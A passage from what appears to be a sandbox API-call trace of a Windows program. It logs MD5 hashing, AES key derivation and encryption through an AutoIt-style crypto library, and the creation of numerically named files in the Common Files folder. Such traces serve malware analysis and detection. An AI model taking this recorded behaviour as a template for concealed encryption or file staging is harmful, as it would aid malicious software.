wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.606] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.606] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.607] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0045.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1ac0 | out: hHeap=0x770000) returned 1 [0045.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afcf8 | out: hHeap=0x770000) returned 1 [0045.607] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.607] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.607] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0045.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2db8 | out: hHeap=0x770000) returned 1 [0045.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afc98 | out: hHeap=0x770000) returned 1 [0045.607] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0045.607] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0045.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1ac0 | out: hHeap=0x770000) returned 1 [0045.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd38 | out: hHeap=0x770000) returned 1 [0045.607] PeekMessageW (in: lpMsg=0x6ae8cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8cc) returned 0 [0045.607] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0045.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c23c0 | out: hHeap=0x770000) returned 1 [0045.607] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0045.607] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0045.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1ac0 | out: hHeap=0x770000) returned 1 [0045.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afc98 | out: hHeap=0x770000) returned 1 [0045.607] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0045.607] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0045.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aba40 | out: hHeap=0x770000) returned 1 [0045.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ba40 | out: hHeap=0x770000) returned 1 [0045.607] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0045.607] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.607] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.608] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0045.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1ac0 | out: hHeap=0x770000) returned 1 [0045.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afce8 | out: hHeap=0x770000) returned 1 [0045.608] PeekMessageW (in: lpMsg=0x6ae8dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8dc) returned 0 [0045.608] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0045.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2de0 | out: hHeap=0x770000) returned 1 [0045.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afce8 | out: hHeap=0x770000) returned 1 [0045.608] PeekMessageW (in: lpMsg=0x6ae8dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8dc) returned 0 [0045.608] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0045.608] CryptCreateHash (in: hProv=0x7d56f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae910 | out: phHash=0x6ae910) returned 1 [0045.608] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.608] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2440 | out: hHeap=0x770000) returned 1 [0045.608] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.608] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.608] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0045.608] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.608] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.608] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0045.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1ac0 | out: hHeap=0x770000) returned 1 [0045.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd18 | out: hHeap=0x770000) returned 1 [0045.608] PeekMessageW (in: lpMsg=0x6ae8dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8dc) returned 0 [0045.608] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0045.609] CryptHashData (hHash=0x7c2400, pbData=0x7ca610, dwDataLen=0x100, dwFlags=0x1) returned 1 [0045.609] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.609] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2440 | out: hHeap=0x770000) returned 1 [0045.609] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.609] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0045.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1ac0 | out: hHeap=0x770000) returned 1 [0045.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd18 | out: hHeap=0x770000) returned 1 [0045.609] PeekMessageW (in: lpMsg=0x6ae8dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8dc) returned 0 [0045.609] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0045.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2de0 | out: hHeap=0x770000) returned 1 [0045.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd18 | out: hHeap=0x770000) returned 1 [0045.609] PeekMessageW (in: lpMsg=0x6ae8dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8dc) returned 0 [0045.609] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0045.609] CryptDeriveKey (in: hProv=0x7d56f0, Algid=0x660e, hBaseData=0x7c2400, dwFlags=0x1, phKey=0x6ae910 | out: phKey=0x6ae910*=0x7c2440) returned 1 [0045.609] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.609] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2480 | out: hHeap=0x770000) returned 1 [0045.609] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.609] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.609] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.609] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0045.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1ac0 | out: hHeap=0x770000) returned 1 [0045.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afc38 | out: hHeap=0x770000) returned 1 [0045.610] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0045.610] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0045.610] CryptDestroyHash (hHash=0x7c2400) returned 1 [0045.610] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.610] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.610] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2400 | out: hHeap=0x770000) returned 1 [0045.610] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0045.610] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.610] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370" (normalized: "c:\\progra~2\\common~1\\2620738370"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0045.610] GetLastError () returned 0x2 [0045.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889790 | out: hHeap=0x770000) returned 1 [0045.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdd8 | out: hHeap=0x770000) returned 1 [0045.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2010 | out: hHeap=0x770000) returned 1 [0045.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0045.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889478 | out: hHeap=0x770000) returned 1 [0045.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0045.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d60 | out: hHeap=0x770000) returned 1 [0045.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2b60 | out: hHeap=0x770000) returned 1 [0045.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe18 | out: hHeap=0x770000) returned 1 [0045.610] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.610] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0045.610] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.611] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370" (normalized: "c:\\progra~2\\common~1\\26207383702620738370"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x234 [0045.611] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.645] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2400 | out: hHeap=0x770000) returned 1 [0045.645] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.645] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.645] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.645] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.645] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.645] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0045.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1b30 | out: hHeap=0x770000) returned 1 [0045.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x770000) returned 1 [0045.645] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.645] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.645] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0045.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab9f8 | out: hHeap=0x770000) returned 1 [0045.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afc98 | out: hHeap=0x770000) returned 1 [0045.645] PeekMessageW (in: lpMsg=0x6aea2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea2c) returned 0 [0045.645] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0045.645] PeekMessageW (in: lpMsg=0x6aea2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea2c) returned 0 [0045.645] PeekMessageW (in: lpMsg=0x6aea2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea2c) returned 0 [0045.645] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0045.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1b30 | out: hHeap=0x770000) returned 1 [0045.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afc08 | out: hHeap=0x770000) returned 1 [0045.645] PeekMessageW (in: lpMsg=0x6ae3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3dc) returned 0 [0045.646] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0045.646] CryptGetKeyParam (in: hKey=0x7c2440, dwParam=0x7, pbData=0x7afce8, pdwDataLen=0x6ae3f8, dwFlags=0x0 | out: pbData=0x7afce8*=0x660e, pdwDataLen=0x6ae3f8*=0x4) returned 1 [0045.646] PeekMessageW (in: lpMsg=0x6aea2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea2c) returned 0 [0045.646] PeekMessageW (in: lpMsg=0x6aea2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea2c) returned 0 [0045.646] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.646] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.646] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.646] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2480 | out: hHeap=0x770000) returned 1 [0045.646] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.646] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.646] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0045.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2e30 | out: hHeap=0x770000) returned 1 [0045.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdb8 | out: hHeap=0x770000) returned 1 [0045.646] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0045.646] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0045.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1b30 | out: hHeap=0x770000) returned 1 [0045.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afbe8 | out: hHeap=0x770000) returned 1 [0045.646] PeekMessageW (in: lpMsg=0x6ae8cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8cc) returned 0 [0045.646] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0045.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2480 | out: hHeap=0x770000) returned 1 [0045.646] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0045.646] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0045.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1b30 | out: hHeap=0x770000) returned 1 [0045.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdb8 | out: hHeap=0x770000) returned 1 [0045.647] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0045.647] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0045.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aba40 | out: hHeap=0x770000) returned 1 [0045.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b7b8 | out: hHeap=0x770000) returned 1 [0045.647] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0045.647] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.647] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.647] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c24c0 | out: hHeap=0x770000) returned 1 [0045.647] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.647] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0045.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1b30 | out: hHeap=0x770000) returned 1 [0045.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afbf8 | out: hHeap=0x770000) returned 1 [0045.647] PeekMessageW (in: lpMsg=0x6ae8dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8dc) returned 0 [0045.647] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0045.647] CryptEncrypt (in: hKey=0x7c2440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae928*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae928*=0x10) returned 1 [0045.647] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.647] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c24c0 | out: hHeap=0x770000) returned 1 [0045.647] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.647] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.647] CharLowerBuffW (in: lpsz="byte[17]", cchLength=0x8 | out: lpsz="byte[17]") returned 0x8 [0045.647] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.647] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0045.648] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0045.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1b30 | out: hHeap=0x770000) returned 1 [0045.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afbe8 | out: hHeap=0x770000) returned 1 [0045.648] PeekMessageW (in: lpMsg=0x6ae8dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8dc) returned 0 [0045.648] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0045.648] CryptEncrypt (in: hKey=0x7c2440, 